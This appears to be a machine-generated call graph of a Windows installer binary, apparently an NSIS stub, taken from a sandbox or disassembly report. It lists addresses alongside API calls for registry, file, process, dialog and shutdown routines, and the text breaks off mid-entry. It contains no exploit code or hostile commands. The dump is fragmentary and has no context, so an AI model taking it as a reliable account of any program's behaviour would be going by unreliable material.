3903->3885 3903->3902 3904->3885 3905 406594 21 API calls 3905->3910 3906->3908 3906->3916 3908->3887 3911 404110 3909->3911 3912 4040fb 3909->3912 3910->3885 3910->3900 3910->3901 3910->3905 3913 4044d6 22 API calls 3910->3913 3917 4044d6 22 API calls 3910->3917 3933 4043a1 DestroyWindow 3910->3933 3914 40140b 2 API calls 3911->3914 3915 40140b 2 API calls 3912->3915 3913->3910 3914->3916 3915->3916 3916->3887 3942 4044af 3916->3942 3918 404288 GetDlgItem 3917->3918 3919 4042a5 ShowWindow EnableWindow 3918->3919 3920 40429d 3918->3920 3945 4044f8 EnableWindow 3919->3945 3920->3919 3922 4042cf EnableWindow 3927 4042e3 3922->3927 3923 4042e8 GetSystemMenu EnableMenuItem SendMessageW 3924 404318 SendMessageW 3923->3924 3923->3927 3924->3927 3926 403fb8 22 API calls 3926->3927 3927->3923 3927->3926 3946 40450b SendMessageW 3927->3946 3947 406557 lstrcpynW 3927->3947 3929 404347 lstrlenW 3930 406594 21 API calls 3929->3930 3931 40435d SetWindowTextW 3930->3931 3932 401389 2 API calls 3931->3932 3932->3910 3933->3891 3934 4043bb CreateDialogParamW 3933->3934 3934->3891 3935 4043ee 3934->3935 3936 4044d6 22 API calls 3935->3936 3937 4043f9 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3936->3937 3938 401389 2 API calls 3937->3938 3939 40443f 3938->3939 3939->3885 3940 404447 ShowWindow 3939->3940 3941 404522 SendMessageW 3940->3941 3941->3891 3943 4044b6 3942->3943 3944 4044bc SendMessageW 3942->3944 3943->3944 3944->3887 3945->3922 3946->3927 3947->3929 3948 4014d7 3949 402d89 21 API calls 3948->3949 3950 4014dd Sleep 3949->3950 3952 402c2f 3950->3952 3953 40195b 3954 402dab 21 API calls 3953->3954 3955 401962 lstrlenW 3954->3955 3956 40263d 3955->3956 3519 4020dd 3520 4021a1 3519->3520 3521 4020ef 3519->3521 3523 401423 28 API calls 3520->3523 3522 402dab 21 API calls 3521->3522 3524 4020f6 3522->3524 3529 4022fb 3523->3529 3525 402dab 21 API calls 3524->3525 3526 4020ff 3525->3526 3527 402115 LoadLibraryExW 3526->3527 3528 402107 GetModuleHandleW 3526->3528 3527->3520 3530 402126 3527->3530 3528->3527 3528->3530 3539 4069ba 3530->3539 3533 402170 3535 4055dc 28 API calls 3533->3535 3534 402137 3536 401423 28 API calls 3534->3536 3537 402147 3534->3537 3535->3537 3536->3537 3537->3529 3538 402193 FreeLibrary 3537->3538 3538->3529 3544 406579 WideCharToMultiByte 3539->3544 3541 4069d7 3542 402131 3541->3542 3543 4069de GetProcAddress 3541->3543 3542->3533 3542->3534 3543->3542 3544->3541 3957 402b5e 3958 402bb0 3957->3958 3959 402b65 3957->3959 3960 40694b 5 API calls 3958->3960 3962 402d89 21 API calls 3959->3962 3965 402bae 3959->3965 3961 402bb7 3960->3961 3963 402dab 21 API calls 3961->3963 3964 402b73 3962->3964 3966 402bc0 3963->3966 3967 402d89 21 API calls 3964->3967 3966->3965 3968 402bc4 IIDFromString 3966->3968 3971 402b7f 3967->3971 3968->3965 3969 402bd3 3968->3969 3969->3965 3975 406557 lstrcpynW 3969->3975 3974 40649e wsprintfW 3971->3974 3972 402bf0 CoTaskMemFree 3972->3965 3974->3965 3975->3972 2924 401761 2930 402dab 2924->2930 2928 40176f 2929 406076 2 API calls 2928->2929 2929->2928 2931 402db7 2930->2931 2940 406594 2931->2940 2934 401768 2936 406076 2934->2936 2937 406083 GetTickCount GetTempFileNameW 2936->2937 2938 4060bd 2937->2938 2939 4060b9 2937->2939 2938->2928 2939->2937 2939->2938 2955 40659f 2940->2955 2941 4067e6 2942 402dd8 2941->2942 2979 406557 lstrcpynW 2941->2979 2942->2934 2957 406805 2942->2957 2944 4067b7 lstrlenW 2944->2955 2948 4066b0 GetSystemDirectoryW 2948->2955 2949 406594 15 API calls 2949->2944 2950 4066c6 GetWindowsDirectoryW 2950->2955 2951 406594 15 API calls 2951->2955 2952 406758 lstrcatW 2952->2955 2953 406805 5 API calls 2953->2955 2955->2941 2955->2944 2955->2948 2955->2949 2955->2950 2955->2951 2955->2952 2955->2953 2956 406728 SHGetPathFromIDListW CoTaskMemFree 2955->2956 2966 406425 2955->2966 2971 40694b GetModuleHandleA 2955->2971 2977 40649e wsprintfW 2955->2977 2978 406557 lstrcpynW 2955->2978 2956->2955 2963 406812 2957->2963 2958 40688d CharPrevW 2959 406888 2958->2959 2959->2958 2961 4068ae 2959->2961 2960 40687b CharNextW 2960->2959 2960->2963 2961->2934 2963->2959 2963->2960 2964 406867 CharNextW 2963->2964 2965 406876 CharNextW 2963->2965 2987 405e53 2963->2987 2964->2963 2965->2960 2980 4063c4 2966->2980 2969 406489 2969->2955 2970 406459 RegQueryValueExW RegCloseKey 2970->2969 2972 406971 GetProcAddress 2971->2972 2973 406967 2971->2973 2974 406980 2972->2974 2984 4068db GetSystemDirectoryW 2973->2984 2974->2955 2976 40696d 2976->2972 2976->2974 2977->2955 2978->2955 2979->2942 2981 4063d3 2980->2981 2982 4063d7 2981->2982 2983 4063dc RegOpenKeyExW 2981->2983 2982->2969 2982->2970 2983->2982 2985 4068fd wsprintfW LoadLibraryExW 2984->2985 2985->2976 2988 405e59 2987->2988 2989 405e6f 2988->2989 2990 405e60 CharNextW 2988->2990 2989->2963 2990->2988 3976 401d62 3977 402d89 21 API calls 3976->3977 3978 401d73 SetWindowLongW 3977->3978 3979 402c2f 3978->3979 3980 4028e3 3981 4028eb 3980->3981 3982 4028ef FindNextFileW 3981->3982 3985 402901 3981->3985 3983 402948 3982->3983 3982->3985 3986 406557 lstrcpynW 3983->3986 3986->3985 3987 403be7 3988 403bf2 3987->3988 3989 403bf9 GlobalAlloc 3988->3989 3990 403bf6 3988->3990 3989->3990 3991 401568 3992 402ba9 3991->3992 3995 40649e wsprintfW 3992->3995 3994 402bae 3995->3994 3996 40196d 3997 402d89 21 API calls 3996->3997 3998 401974 3997->3998 3999 402d89 21 API calls 3998->3999 4000 401981 3999->4000 4001 402dab 21 API calls 4000->4001 4002 401998 lstrlenW 4001->4002 4004 4019a9 4002->4004 4003 4019ea 4004->4003 4008 406557 lstrcpynW 4004->4008 4006 4019da 4006->4003 4007 4019df lstrlenW 4006->4007 4007->4003 4008->4006 4009 40166f 4010 402dab 21 API calls 4009->4010 4011 401675 4010->4011 4012 4068b4 2 API calls 4011->4012 4013 40167b 4012->4013 4014 402af0 4015 402d89 21 API calls 4014->4015 4016 402af6 4015->4016 4017 402933 4016->4017 4018 406594 21 API calls 4016->4018 4018->4017 4019 4026f1 4020 402d89 21 API calls 4019->4020 4028 402700 4020->4028 4021 40283d 4022 40274a ReadFile 4022->4021 4022->4028 4023 4060ca ReadFile 4023->4028 4024 406128 5 API calls 4024->4028 4025 40278a MultiByteToWideChar 4025->4028 4026 40283f 4032 40649e wsprintfW 4026->4032 4028->4021 4028->4022 4028->4023 4028->4024 4028->4025 4028->4026 4029 4027b0 SetFilePointer MultiByteToWideChar 4028->4029 4031 402850 4028->4031 4029->4028 4030 402871 SetFilePointer 4030->4021 4031->4021 4031->4030 4032->4021 3424 401774 3425 402dab 21 API calls 3424->3425 3426 40177b 3425->3426 3427 4017a3 3426->3427 3428 40179b 3426->3428 3464 406557 lstrcpynW 3427->3464 3463 406557 lstrcpynW 3428->3463 3431 4017a1 3435 406805 5 API calls 3431->3435 3432 4017ae 3433 405e26 3 API calls 3432->3433 3434 4017b4 lstrcatW 3433->3434 3434->3431 3445 4017c0 3435->3445 3436 4068b4 2 API calls 3436->3445 3437 406022 2 API calls 3437->3445 3439 4017d2 CompareFileTime 3439->3445 3440 401892 3441 4055dc 28 API calls 3440->3441 3443 40189c 3441->3443 3442 4055dc 28 API calls 3444 40187e 3442->3444 3446 4032b9 35 API calls 3443->3446 3445->3436 3445->3437 3445->3439 3445->3440 3449 406594 21 API calls 3445->3449 3454 406557 lstrcpynW 3445->3454 3459 405bb7 MessageBoxIndirectW 3445->3459 3460 401869 3445->3460 3462 406047 GetFileAttributesW CreateFileW 3445->3462 3447 4018af 3446->3447 3448 4018c3 SetFileTime 3447->3448 3450 4018d5 FindCloseChangeNotification 3447->3450 3448->3450 3449->3445 3450->3444 3451 4018e6 3450->3451 3452 4018eb 3451->3452 3453 4018fe 3451->3453 3455 406594 21 API calls 3452->3455 3456 406594 21 API calls 3453->3456 3454->3445 3457 4018f3 lstrcatW 3455->3457 3458 401906 3456->3458 3457->3458 3461 405bb7 MessageBoxIndirectW 3458->3461 3459->3445 3460->3442 3460->3444 3461->3444 3462->3445 3463->3431 3464->3432 4033 4014f5 SetForegroundWindow 4034 402c2f 4033->4034 4035 401a77 4036 402d89 21 API calls 4035->4036 4037 401a80 4036->4037 4038 402d89 21 API calls 4037->4038 4039 401a25 4038->4039 4040 401578 4041 401591 4040->4041 4042 401588 ShowWindow 4040->4042 4043 402c2f 4041->4043 4044 40159f ShowWindow 4041->4044 4042->4041 4044->4043 4045 4023f9 4046 402dab 21 API calls 4045->4046 4047 402408 4046->4047 4048 402dab 21 API calls 4047->4048 4049 402411 4048->4049 4050 402dab 21 API calls 4049->4050 4051 40241b GetPrivateProfileStringW 4050->4051 4052 401ffb 4053 402dab 21 API calls 4052->4053 4054 402002 4053->4054 4055 4068b4 2 API calls 4054->4055 4056 402008 4055->4056 4058 402019 4056->4058 4059 40649e wsprintfW 4056->4059 4059->4058 4060 401b7c 4061 402dab 21 API calls 4060->4061 4062 401b83 4061->4062 4063 402d89 21 API calls 4062->4063 4064 401b8c wsprintfW 4063->4064 4065 402c2f 4064->4065 4066 401000 4067 401037 BeginPaint GetClientRect 4066->4067 4068 40100c DefWindowProcW 4066->4068 4070 4010f3 4067->4070 4073 401179 4068->4073 4071 401073 CreateBrushIndirect FillRect DeleteObject 4070->4071 4072 4010fc 4070->4072 4071->4070 4074 401102 CreateFontIndirectW 4072->4074 4075 401167 EndPaint 4072->4075 4074->4075 4076 401112 6 API calls 4074->4076 4075->4073 4076->4075 4077 404980 4078 404990 4077->4078 4079 4049b6 4077->4079 4080 4044d6 22 API calls 4078->4080 4081 40453d 8 API calls 4079->4081 4082 40499d SetDlgItemTextW 4080->4082 4083 4049c2 4081->4083 4082->4079 4084 401680 4085 402dab 21 API calls 4084->4085 4086 401687 4085->4086 4087 402dab 21 API calls 4086->4087 4088 401690 4087->4088 4089 402dab 21 API calls 4088->4089 4090 401699 MoveFileW 4089->4090 4091 4016a5 4090->4091 4092 4016ac 4090->4092 4094 401423 28 API calls 4091->4094 4093 4068b4 2 API calls 4092->4093 4096 4022fb 4092->4096 4095 4016bb 4093->4095 4094->4096 4095->4096 4097 406317 40 API calls 4095->4097 4097->4091 4098 401503 4099 401508 4098->4099 4101 401520 4098->4101 4100 402d89 21 API calls 4099->4100 4100->4101 4102 401a04 4103 402dab 21 API calls 4102->4103 4104 401a0b 4103->4104 4105 402dab 21 API calls 4104->4105 4106 401a14 4105->4106 4107 401a1b lstrcmpiW 4106->4107 4108 401a2d lstrcmpW 4106->4108 4109 401a21 4107->4109 4108->4109 4110 402304 4111 402dab 21 API calls 4110->4111 4112 40230a 4111->4112 4113 402dab 21 API calls 4112->4113 4114 402313 4113->4114 4115 402dab 21 API calls 4114->4115 4116 40231c 4115->4116 4117 4068b4 2 API calls 4116->4117 4118 402325 4117->4118 4119 402336 lstrlenW lstrlenW 4118->4119 4120 402329 4118->4120 4122 4055dc 28 API calls 4119->4122 4121 4055dc 28 API calls 4120->4121 4124 402331 4120->4124 4121->4124 4123 402374 SHFileOperationW 4122->4123 4123->4120 4123->4124 4125 401d86 4126 401d99 GetDlgItem 4125->4126 4127 401d8c 4125->4127 4129 401d93 4126->4129 4128 402d89 21 API calls 4127->4128 4128->4129 4130 401dda GetClientRect LoadImageW SendMessageW 4129->4130 4131 402dab 21 API calls 4129->4131 4133 401e38 4130->4133 4135 401e44 4130->4135 4131->4130 4134 401e3d DeleteObject 4133->4134 4133->4135 4134->4135 4136 402388 4137 4023a2 4136->4137 4138 40238f 4136->4138 4139 406594 21 API calls 4138->4139 4140 40239c 4139->4140 4141 405bb7 MessageBoxIndirectW 4140->4141 4141->4137 3494 401389 3496 401390 3494->3496 3495 4013fe 3496->3495 3497 4013cb MulDiv SendMessageW 3496->3497 3497->3496 4142 402c0a SendMessageW 4143 402c24 InvalidateRect 4142->4143 4144 402c2f 4142->4144 4143->4144 4145 40460c lstrcpynW lstrlenW 3556 40248f 3557 402dab 21 API calls 3556->3557 3558 4024a1 3557->3558 3559 402dab 21 API calls 3558->3559 3560 4024ab 3559->3560 3573 402e3b 3560->3573 3563 4024e3 3565 4024ef 3563->3565 3568 402d89 21 API calls 3563->3568 3564 402dab 21 API calls 3567 4024d9 lstrlenW 3564->3567 3569 40250e RegSetValueExW 3565->3569 3570 4032b9 35 API calls 3565->3570 3566 402933 3567->3563 3568->3565 3571 402524 RegCloseKey 3569->3571 3570->3569 3571->3566 3574 402e56 3573->3574 3577 4063f2 3574->3577 3578 406401 3577->3578 3579 4024bb 3578->3579 3580 40640c RegCreateKeyExW 3578->3580 3579->3563 3579->3564 3579->3566 3580->3579 4146 402910 4147 402dab 21 API calls 4146->4147 4148 402917 FindFirstFileW 4147->4148 4149 40293f 4148->4149 4153 40292a 4148->4153 4154 40649e wsprintfW 4149->4154 4151 402948 4155 406557 lstrcpynW 4151->4155 4154->4151 4155->4153 4156 401911 4157 401948 4156->4157 4158 402dab 21 API calls 4157->4158 4159 40194d 4158->4159 4160 405c63 71 API calls 4159->4160 4161 401956 4160->4161 4162 401491 4163 4055dc 28 API calls 4162->4163 4164 401498 4163->4164 4165 401914 4166 402dab 21 API calls 4165->4166 4167 40191b 4166->4167 4168 405bb7 MessageBoxIndirectW 4167->4168 4169 401924 4168->4169 4170 404695 4171 4047c7 4170->4171 4172 4046ad 4170->4172 4173 404831 4171->4173 4176 4048fb 4171->4176 4179 404802 GetDlgItem SendMessageW 4171->4179 4175 4044d6 22 API calls 4172->4175 4174 40483b GetDlgItem 4173->4174 4173->4176 4177 404855 4174->4177 4178 4048bc 4174->4178 4180 404714 4175->4180 4181 40453d 8 API calls 4176->4181 4177->4178 4185 40487b SendMessageW LoadCursorW SetCursor 4177->4185 4178->4176 4186 4048ce 4178->4186 4203 4044f8 EnableWindow 4179->4203 4183 4044d6 22 API calls 4180->4183 4184 4048f6 4181->4184 4188 404721 CheckDlgButton 4183->4188 4204 404944 4185->4204 4190 4048e4 4186->4190 4191 4048d4 SendMessageW 4186->4191 4187 40482c 4193 404920 SendMessageW 4187->4193 4201 4044f8 EnableWindow 4188->4201 4190->4184 4192 4048ea SendMessageW 4190->4192 4191->4190 4192->4184 4193->4173 4196 40473f GetDlgItem 4202 40450b SendMessageW 4196->4202 4198 404755 SendMessageW 4199 404772 GetSysColor 4198->4199 4200 40477b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4198->4200 4199->4200 4200->4184 4201->4196 4202->4198 4203->4187 4207 405b7d ShellExecuteExW 4204->4207 4206 4048aa LoadCursorW SetCursor 4206->4178 4207->4206 4208 402896 4209 40289d 4208->4209 4210 402bae 4208->4210 4211 402d89 21 API calls 4209->4211 4212 4028a4 4211->4212 4213 4028b3 SetFilePointer 4212->4213 4213->4210 4214 4028c3 4213->4214 4216 40649e wsprintfW 4214->4216 4216->4210 4217 401f17 4218 402dab 21 API calls 4217->4218 4219 401f1d 4218->4219 4220 402dab 21 API calls 4219->4220 4221 401f26 4220->4221 4222 402dab 21 API calls 4221->4222 4223 401f2f 4222->4223 4224 402dab 21 API calls 4223->4224 4225 401f38 4224->4225 4226 401423 28 API calls 4225->4226 4227 401f3f 4226->4227 4234 405b7d ShellExecuteExW 4227->4234 4229 401f87 4230 402933 4229->4230 4231 4069f6 5 API calls 4229->4231 4232 401fa4 CloseHandle 4231->4232 4232->4230 4234->4229 4235 402f98 4236 402faa SetTimer 4235->4236 4238 402fc3 4235->4238 4236->4238 4237 403018 4238->4237 4239 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4238->4239 4239->4237 4240 40571b 4241 4058c5 4240->4241 4242 40573c GetDlgItem GetDlgItem GetDlgItem 4240->4242 4244 4058f6 4241->4244 4245 4058ce GetDlgItem CreateThread CloseHandle 4241->4245 4285 40450b SendMessageW 4242->4285 4247 405921 4244->4247 4248 405946 4244->4248 4249 40590d ShowWindow ShowWindow 4244->4249 4245->4244 4246 4057ac 4252 4057b3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4246->4252 4250 405981 4247->4250 4254 405935 4247->4254 4255 40595b ShowWindow 4247->4255 4251 40453d 8 API calls 4248->4251 4287 40450b SendMessageW 4249->4287 4250->4248 4262 40598f SendMessageW 4250->4262 4257 405954 4251->4257 4260 405821 4252->4260 4261 405805 SendMessageW SendMessageW 4252->4261 4256 4044af SendMessageW 4254->4256 4258 40597b 4255->4258 4259 40596d 4255->4259 4256->4248 4264 4044af SendMessageW 4258->4264 4263 4055dc 28 API calls 4259->4263 4265 405834 4260->4265 4266 405826 SendMessageW 4260->4266 4261->4260 4262->4257 4267 4059a8 CreatePopupMenu 4262->4267 4263->4258 4264->4250 4269 4044d6 22 API calls 4265->4269 4266->4265 4268 406594 21 API calls 4267->4268 4270 4059b8 AppendMenuW 4268->4270 4271 405844 4269->4271 4274 4059d5 GetWindowRect 4270->4274 4275 4059e8 TrackPopupMenu 4270->4275 4272 405881 GetDlgItem SendMessageW 4271->4272 4273 40584d ShowWindow 4271->4273 4272->4257 4279 4058a8 SendMessageW SendMessageW 4272->4279 4276 405870 4273->4276 4277 405863 ShowWindow 4273->4277 4274->4275 4275->4257 4278 405a03 4275->4278 4286 40450b SendMessageW 4276->4286 4277->4276 4280 405a1f SendMessageW 4278->4280 4279->4257 4280->4280 4281 405a3c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4280->4281 4283 405a61 SendMessageW 4281->4283 4283->4283 4284 405a8a GlobalUnlock SetClipboardData CloseClipboard 4283->4284 4284->4257 4285->4246 4286->4272 4287->4247 4288 401d1c 4289 402d89 21 API calls 4288->4289 4290 401d22 IsWindow 4289->4290 4291 401a25 4290->4291 4292 404d1d 4293 404d49 4292->4293 4294 404d2d 4292->4294 4295 404d7c 4293->4295 4296 404d4f SHGetPathFromIDListW 4293->4296 4303 405b9b GetDlgItemTextW 4294->4303 4298 404d5f 4296->4298 4302 404d66 SendMessageW 4296->4302 4300 40140b 2 API calls 4298->4300 4299 404d3a SendMessageW 4299->4293 4300->4302 4302->4295 4303->4299 4304 40149e 4305 4023a2 4304->4305 4306 4014ac PostQuitMessage 4304->4306 4306->4305 4307 401ba0 4308 401bf1 4307->4308 4309 401bad 4307->4309 4311 401bf6 4308->4311 4312 401c1b GlobalAlloc 4308->4312 4310 401c36 4309->4310 4316 401bc4 4309->4316 4313 406594 21 API calls 4310->4313 4325 4023a2 4310->4325 4311->4325 4328 406557 lstrcpynW 4311->4328 4314 406594 21 API calls 4312->4314 4315 40239c 4313->4315 4314->4310 4321 405bb7 MessageBoxIndirectW 4315->4321 4326 406557 lstrcpynW 4316->4326 4319 401c08 GlobalFree 4319->4325 4320 401bd3 4327 406557 lstrcpynW 4320->4327 4321->4325 4323 401be2 4329 406557 lstrcpynW 4323->4329 4326->4320 4327->4323 4328->4319 4329->4325 4330 402621 4331 402dab 21 API calls 4330->4331 4332 402628 4331->4332 4335 406047 GetFileAttributesW CreateFileW 4332->4335 4334 402634 4335->4334 3405 4025a3 3416 402deb 3405->3416 3409 4025b6 3410 4025d2 RegEnumKeyW 3409->3410 3411 4025de RegEnumValueW 3409->3411 3412 402933 3409->3412 3413 4025fa RegCloseKey 3410->3413 3411->3413 3414 4025f3 3411->3414 3413->3412 3414->3413 3417 402dab 21 API calls 3416->3417 3418 402e02 3417->3418 3419 4063c4 RegOpenKeyExW 3418->3419 3420 4025ad 3419->3420 3421 402d89 3420->3421 3422 406594 21 API calls 3421->3422 3423 402d9e 3422->3423 3423->3409 4336 4015a8 4337 402dab 21 API calls 4336->4337 4338 4015af SetFileAttributesW 4337->4338 4339 4015c1 4338->4339 3498 401fa9 3499 402dab 21 API calls 3498->3499 3500 401faf 3499->3500 3501 4055dc 28 API calls 3500->3501 3502 401fb9 3501->3502 3503 405b3a 2 API calls 3502->3503 3504 401fbf 3503->3504 3505 401fe2 CloseHandle 3504->3505 3509 402933 3504->3509 3513 4069f6 WaitForSingleObject 3504->3513 3505->3509 3508 401fd4 3510 401fe4 3508->3510 3511 401fd9 3508->3511 3510->3505 3518 40649e wsprintfW 3511->3518 3514 406a10 3513->3514 3515 406a22 GetExitCodeProcess 3514->3515 3516 406987 2 API calls 3514->3516 3515->3508 3517 406a17 WaitForSingleObject 3516->3517 3517->3514 3518->3505 4340 40202f 4341 402dab 21 API calls 4340->4341 4342 402036 4341->4342 4343 40694b 5 API calls 4342->4343 4344 402045 4343->4344 4345 402061 GlobalAlloc 4344->4345 4346 4020d1 4344->4346 4345->4346 4347 402075 4345->4347 4348 40694b 5 API calls 4347->4348 4349 40207c 4348->4349 4350 40694b 5 API calls 4349->4350 4351 402086 4350->4351 4351->4346 4355 40649e wsprintfW 4351->4355 4353 4020bf 4356 40649e wsprintfW 4353->4356 4355->4353 4356->4346 4357 40252f 4358 402deb 21 API calls 4357->4358 4359 402539 4358->4359 4360 402dab 21 API calls 4359->4360 4361 402542 4360->4361 4362 40254d RegQueryValueExW 4361->4362 4364 402933 4361->4364 4363 40256d 4362->4363 4367 402573 RegCloseKey 4362->4367 4363->4367 4368 40649e wsprintfW 4363->4368 4367->4364 4368->4367 4369 4021af 4370 402dab 21 API calls 4369->4370 4371 4021b6 4370->4371 4372 402dab 21 API calls 4371->4372 4373 4021c0 4372->4373 4374 402dab 21 API calls 4373->4374 4375 4021ca 4374->4375 4376 402dab 21 API calls 4375->4376 4377 4021d4 4376->4377 4378 402dab 21 API calls 4377->4378 4379 4021de 4378->4379 4380 40221d CoCreateInstance 4379->4380 4381 402dab 21 API calls 4379->4381 4384 40223c 4380->4384 4381->4380 4382 401423 28 API calls 4383 4022fb 4382->4383 4384->4382 4384->4383 2991 403532 SetErrorMode GetVersionExW 2992 403586 GetVersionExW 2991->2992 2993 4035be 2991->2993 2992->2993 2994 403615 2993->2994 2995 40694b 5 API calls 2993->2995 2996 4068db 3 API calls 2994->2996 2995->2994 2997 40362b lstrlenA 2996->2997 2997->2994 2998 40363b 2997->2998 2999 40694b 5 API calls 2998->2999 3000 403642 2999->3000 3001 40694b 5 API calls 3000->3001 3002 403649 3001->3002 3003 40694b 5 API calls 3002->3003 3007 403655 #17 OleInitialize SHGetFileInfoW 3003->3007 3006 4036a4 GetCommandLineW 3080 406557 lstrcpynW 3006->3080 3079 406557 lstrcpynW 3007->3079 3009 4036b6 3010 405e53 CharNextW 3009->3010 3011 4036dc CharNextW 3010->3011 3019 4036ee 3011->3019 3012 4037f0 3013 403804 GetTempPathW 3012->3013 3081 403501 3013->3081 3015 40381c 3016 403820 GetWindowsDirectoryW lstrcatW 3015->3016 3017 403876 DeleteFileW 3015->3017 3020 403501 12 API calls 3016->3020 3091 403082 GetTickCount GetModuleFileNameW 3017->3091 3018 405e53 CharNextW 3018->3019 3019->3012 3019->3018 3025 4037f2 3019->3025 3022 40383c 3020->3022 3022->3017 3024 403840 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3022->3024 3023 40388a 3026 403a7d ExitProcess OleUninitialize 3023->3026 3030 403931 3023->3030 3034 405e53 CharNextW 3023->3034 3027 403501 12 API calls 3024->3027 3176 406557 lstrcpynW 3025->3176 3028 403ab3 3026->3028 3029 403a8f 3026->3029 3032 40386e 3027->3032 3035 403b37 ExitProcess 3028->3035 3036 403abb GetCurrentProcess OpenProcessToken 3028->3036 3250 405bb7 3029->3250 3119 403c29 3030->3119 3032->3017 3032->3026 3048 4038a9 3034->3048 3040 403ad3 LookupPrivilegeValueW AdjustTokenPrivileges 3036->3040 3041 403b07 3036->3041 3040->3041 3043 40694b 5 API calls 3041->3043 3044 403b0e 3043->3044 3049 403b23 ExitWindowsEx 3044->3049 3052 403b30 3044->3052 3045 403907 3177 405f2e 3045->3177 3046 40394a 3193 405b22 3046->3193 3048->3045 3048->3046 3049->3035 3049->3052 3254 40140b 3052->3254 3056 403969 3058 403981 3056->3058 3197 406557 lstrcpynW 3056->3197 3062 4039a7 wsprintfW 3058->3062 3076 4039d3 3058->3076 3059 403926 3192 406557 lstrcpynW 3059->3192 3063 406594 21 API calls 3062->3063 3063->3058 3066 4039e3 GetFileAttributesW 3068 4039ef DeleteFileW 3066->3068 3066->3076 3067 403a1d SetCurrentDirectoryW 3240 406317 MoveFileExW 3067->3240 3068->3076 3070 403a1b 3070->3026 3073 406317 40 API calls 3073->3076 3074 406594 21 API calls 3074->3076 3076->3058 3076->3062 3076->3066 3076->3067 3076->3070 3076->3073 3076->3074 3077 403aa5 CloseHandle 3076->3077 3198 405aab CreateDirectoryW 3076->3198 3201 405b05 CreateDirectoryW 3076->3201 3204 405c63 3076->3204 3244 405b3a CreateProcessW 3076->3244 3247 4068b4 FindFirstFileW 3076->3247 3077->3070 3079->3006 3080->3009 3082 406805 5 API calls 3081->3082 3084 40350d 3082->3084 3083 403517 3083->3015 3084->3083 3257 405e26 lstrlenW CharPrevW 3084->3257 3087 405b05 2 API calls 3088 403525 3087->3088 3089 406076 2 API calls 3088->3089 3090 403530 3089->3090 3090->3015 3260 406047 GetFileAttributesW CreateFileW 3091->3260 3093 4030c2 3111 4030d2 3093->3111 3261 406557 lstrcpynW 3093->3261 3095 4030e8 3262 405e72 lstrlenW 3095->3262 3099 4030f9 GetFileSize 3100 4031f3 3099->3100 3113 403110 3099->3113 3267 40301e 3100->3267 3102 4031fc 3104 40322c GlobalAlloc 3102->3104 3102->3111 3302 4034ea SetFilePointer 3102->3302 3278 4034ea SetFilePointer 3104->3278 3106 40325f 3108 40301e 6 API calls 3106->3108 3108->3111 3109 403215 3112 4034d4 ReadFile 3109->3112 3110 403247 3279 4032b9 3110->3279 3111->3023 3115 403220 3112->3115 3113->3100 3113->3106 3113->3111 3116 40301e 6 API calls 3113->3116 3299 4034d4 3113->3299 3115->3104 3115->3111 3116->3113 3117 403253 3117->3111 3117->3117 3118 403290 SetFilePointer 3117->3118 3118->3111 3120 40694b 5 API calls 3119->3120 3121 403c3d 3120->3121 3122 403c43 GetUserDefaultUILanguage 3121->3122 3123 403c55 3121->3123 3323 40649e wsprintfW 3122->3323 3124 406425 3 API calls 3123->3124 3126 403c85 3124->3126 3128 403ca4 lstrcatW 3126->3128 3129 406425 3 API calls 3126->3129 3127 403c53 3324 403eff 3127->3324 3128->3127 3129->3128 3132 405f2e 18 API calls 3133 403cd6 3132->3133 3134 403d6a 3133->3134 3136 406425 3 API calls 3133->3136 3135 405f2e 18 API calls 3134->3135 3137 403d70 3135->3137 3138 403d08 3136->3138 3139 403d80 LoadImageW 3137->3139 3140 406594 21 API calls 3137->3140 3138->3134 3145 403d29 lstrlenW 3138->3145 3146 405e53 CharNextW 3138->3146 3141 403e26 3139->3141 3142 403da7 RegisterClassW 3139->3142 3140->3139 3144 40140b 2 API calls 3141->3144 3143 403ddd SystemParametersInfoW CreateWindowExW 3142->3143 3152 403941 3142->3152 3143->3141 3149 403e2c 3144->3149 3147 403d37 lstrcmpiW 3145->3147 3148 403d5d 3145->3148 3150 403d26 3146->3150 3147->3148 3151 403d47 GetFileAttributesW 3147->3151 3153 405e26 3 API calls 3148->3153 3149->3152 3155 403eff 22 API calls 3149->3155 3150->3145 3154 403d53 3151->3154 3152->3026 3156 403d63 3153->3156 3154->3148 3157 405e72 2 API calls 3154->3157 3158 403e3d 3155->3158 3332 406557 lstrcpynW 3156->3332 3157->3148 3160 403e49 ShowWindow 3158->3160 3161 403ecc 3158->3161 3163 4068db 3 API calls 3160->3163 3333 4056af OleInitialize 3161->3333 3165 403e61 3163->3165 3164 403ed2 3166 403ed6 3164->3166 3167 403eee 3164->3167 3168 403e6f GetClassInfoW 3165->3168 3172 4068db 3 API calls 3165->3172 3166->3152 3174 40140b 2 API calls 3166->3174 3171 40140b 2 API calls 3167->3171 3169 403e83 GetClassInfoW RegisterClassW 3168->3169 3170 403e99 DialogBoxParamW 3168->3170 3169->3170 3173 40140b 2 API calls 3170->3173 3171->3152 3172->3168 3175 403ec1 3173->3175 3174->3152 3175->3152 3176->3013 3351 406557 lstrcpynW 3177->3351 3179 405f3f 3352 405ed1 CharNextW CharNextW 3179->3352 3182 403913 3182->3026 3191 406557 lstrcpynW 3182->3191 3183 406805 5 API calls 3189 405f55 3183->3189 3184 405f86 lstrlenW 3185 405f91 3184->3185 3184->3189 3186 405e26 3 API calls 3185->3186 3188 405f96 GetFileAttributesW 3186->3188 3187 4068b4 2 API calls 3187->3189 3188->3182 3189->3182 3189->3184 3189->3187 3190 405e72 2 API calls 3189->3190 3190->3184 3191->3059 3192->3030 3194 40694b 5 API calls 3193->3194 3195 40394f lstrlenW 3194->3195 3196 406557 lstrcpynW 3195->3196 3196->3056 3197->3058 3199 405af7 3198->3199 3200 405afb GetLastError 3198->3200 3199->3076 3200->3199 3202 405b15 3201->3202 3203 405b19 GetLastError 3201->3203 3202->3076 3203->3202 3205 405f2e 18 API calls 3204->3205 3206 405c83 3205->3206 3207 405ca2 3206->3207 3208 405c8b DeleteFileW 3206->3208 3209 405dc2 3207->3209 3358 406557 lstrcpynW 3207->3358 3237 405dd9 3208->3237 3216 4068b4 2 API calls 3209->3216 3209->3237 3211 405cc8 3212 405cdb 3211->3212 3213 405cce lstrcatW 3211->3213 3215 405e72 2 API calls 3212->3215 3214 405ce1 3213->3214 3217 405cf1 lstrcatW 3214->3217 3219 